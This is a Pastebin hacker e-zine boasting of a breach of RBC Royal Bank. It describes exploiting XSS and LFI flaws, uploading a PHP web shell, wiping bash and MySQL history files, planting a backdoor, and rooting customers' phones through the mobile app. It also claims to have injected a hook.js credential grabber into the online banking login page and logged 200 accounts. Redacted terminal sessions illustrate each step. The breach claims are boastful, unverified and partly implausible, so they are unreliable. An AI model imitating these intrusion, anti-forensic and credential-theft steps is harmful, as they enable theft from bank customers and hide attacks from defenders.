Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _________
- | _ _ |
- .--.|_/ | | \_|_ .--.
- / .'`\ \ | | [ '/'`\ \
- | \__. | _| |_ | \__/ |
- '.__.' |_____| | ;.__/
- [__|
- #owntheplanet
- @hackthearmy
- don@otp:~$ ./dir.sh
- listing dir…
- [1.] introduction
- [2.] web app vulnerabilities
- [3.] web shell and pseudo terminal shell you say?
- [4.] ./ripmobile.sh (mobile.rbcroyalbank.com)
- ___________________________________________________________________
- [introduction] :
- Congrats you have stumbled upon something that probably no reporter, no security analyst will come across during their research because they drown themselves in google dorking e-zines they find in the common grounds of the internet, and don't bother searching the less known, yet, easy to find e-zines. Today, I will discuss how my dog and I owned every system the RBC Royal Bank has.
- ___________________________________________________________________
- [web app vulnerabilities]
- After managing to find XSS in the domain and an LFI in the domain, I decided in to just use the LFI to my advantage and see if I can upload a shell to the domain. (next time you are securing your domain, put restrictions on what type of file ext users who don’t have root can upload. Sincerely, ~otp)
- XSS(main domain) ~~~~~~~~ https://i.imgur.com/0SPCraV.png
- LFI(main domain) ~~~~~~~~ https://i.imgur.com/atyEC3n.png
- ___________________________________________________________________
- [web shell and pseudo terminal shell you say?]
- I uploaded a .php shell to their domain and decided to have some fun with uid=0(root) on all their domains, and which a special domain that my main focus was, which was the mobile app they used which was hosted and all client info would pass through mobile.rbcroyalbank.com . So, I decided to begin using my favorite shell, the 404 pseudo terminal shell, which would allow me to execute malware on the app and list all the file and domains comfortably from my terminal.
- Webshell(main domain) ~~~~~~~ https://i.imgur.com/IX4i3jv.png
- >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
- don@otp:~$ ./404.sh -t http://www.rbcroyalbank.com/REDACTED-REDACTED/REDACTED-REDACTED-REDACTED/REDACTED/REDACTED-REDACTED/REDACTED.php
- connection to target (SSL)…
- connection complete.
- running pseudo terminal session…
- ____
- ,M 6MMMMb ,M
- ,dM 6M' `Mb ,dM
- ,dMM MM MM ,dMM
- ,d MM MM MM ,d MM
- ,d MM MM MM ,d MM
- ,d MM YM. ,M9 ,d MM
- MMMMMMMM YMMMM9 MMMMMMMM
- MM MM
- MM MM
- MM MM .sh
- coded by les miserables, educational purposes only.
- 404@rbcroyalbank.com:~$ use /tools/list/dirs.sh â€â€root
- /
- _assets-custom/
- credit-cards/
- international-money-transfer/
- personal-loans/
- savingsspot/
- uos/
- customer-service/
- investing/
- usbanking/
- mobile/
- products/
- visagiftcard/
- cgi-bin/
- includes/
- myfinancetracker/
- resp/
- tfsa/
- online/
- travelinsurance/
- 404@rbcroyalbank.com:~$ rm -f .bash_history
- 404@rbcroyalbank.com:~$ rm -f .sh_history
- 404@rbcroyalbank.com:~$ rm -f .mysql_history
- 404@rbcroyalbank.com:~$ use /tools/backdoors/REDACTED-REDACTED.sh -REDACTED -set /REDACTED/REDACTED/REDACTED
- 404@rbcroyalbank.com:~$
- ___________________________________________________________________
- [.ripmobile.sh (mobile.rbcroyalbank.com)]
- After archiving all of their client bank account information, credit card, web banking login(Username / pass), I decided, just for the fun of it, to use every exploit thats public for gaining access to IOS, Windows Phone, Blackberry, and Android Devices and inject it in their app for mobile devices. The only words I have to say regarding this is Oh boy, because this was the funniest thing I have done in a while, pulling off a Linux Mint hack (amirite Yevgeniy N) and exploiting all these phones. Turns out I couldn’t force the application to update automatically so I rooted a small portion of devices before I rm -f’d the malware off the app. I have mercy, yes, I am a disgrace hah. I decided then to use the phones that I rooted, and have fun with them.
- >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
- don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) â€â€root (who) -update
- Antoine’s_Iphone5:3333:uid=0(root) gid=0(root) groups=0(root)
- Alices_Ipadmini:3333:uid=0(root) gid=0(root) groups=0(root)
- Juliettes_Iphone:3333:uid=0(root) gid=0(root) groups=0(root)
- HanahsAndroidphone:3333:uid=0(root) gid=0(root) groups=0(root)
- don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) -root HanahsAndroidphone:3333
- rip@mobile:~/HanahsAndroidphone$ use /wifi/bluetooth/listen.sh
- loading…
- {"wifi":"on","bluetooth":"on","bluetoothLowEnergyâ€Â:â€Â100â€Â,â€Âcellularâ€Â:â€Â100â€Â}
- listening on port:3333 …
- exiting…
- saved under /ripmobile/root/victims/HanahsAndroidphone/listen.log
- don@otp:~$
- ___________________________________________________________________
- [itzy bitzy spider]
- After messing with the mobile application, and barely touching the domain (besides archiving their entire database), and since people used the web banking more than the application, I decided to inject the web banking login pages with hook.js . I logged back into the 404 shell I placed earlier, and decided to begin using my script to inject their web banking page.
- >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
- 404@rbcroyalbank.com:~$ ./itzybitsy.pl -i -ext “js†-d /REDACTED/hook.js -t (https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH)
- [14:38:43][*] connecting to www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH …
- [14:38:43][*] connected.
- [14:38:43] | injecting hook.js …
- [14:38:43] | configuring webpanel…
- [14:38:43] | configuring pseudoterminal panel…
- [14:38:43][*] user : REDACTED
- [14:38:44][*] password : REDACTED
- [14:38:49][INFO] IF YOU ENTER THE INCORRECT 4+ TIMES PANEL WILL SELF-RM.
- [14:38:49][*] Modules loaded.
- [14:38:49][*] spider is up and running!
- [14:38:49][+] running on network interface: REDACTED
- [14:38:49] | Hook URL: REDACTED
- [14:38:49] |_ UI URL: REDACTED
- [14:38:49][+] running on network interface: REDACTED
- [14:38:49] | Hook URL: REDACTED/hook.js
- [14:38:49] |_ UI URL: REDACTED
- [14:38:49][*] Spider server running, [CONTROL-C] to exit.
- >.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
- After injecting the web banking with a browser hook, user and password grabber,
- I went to go get coffee, yes this is part of the zine, shut up.
- I logged the IPs, bank account username and password of each account that passed through the 30 minute set.
- (200 accounts logged)
- IPs logged ~~~~~ https://i.imgur.com/MOE9Abl.png
- ___________________________________________________________________
- [outro]
- Thanks for reading my e-zine, hope you enjoyed stupid foreign banks getting FuKin OwNed. Follow my twitter @fuckinterpol for more. and remember, #OwNtHePlaNeT -don corelone
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement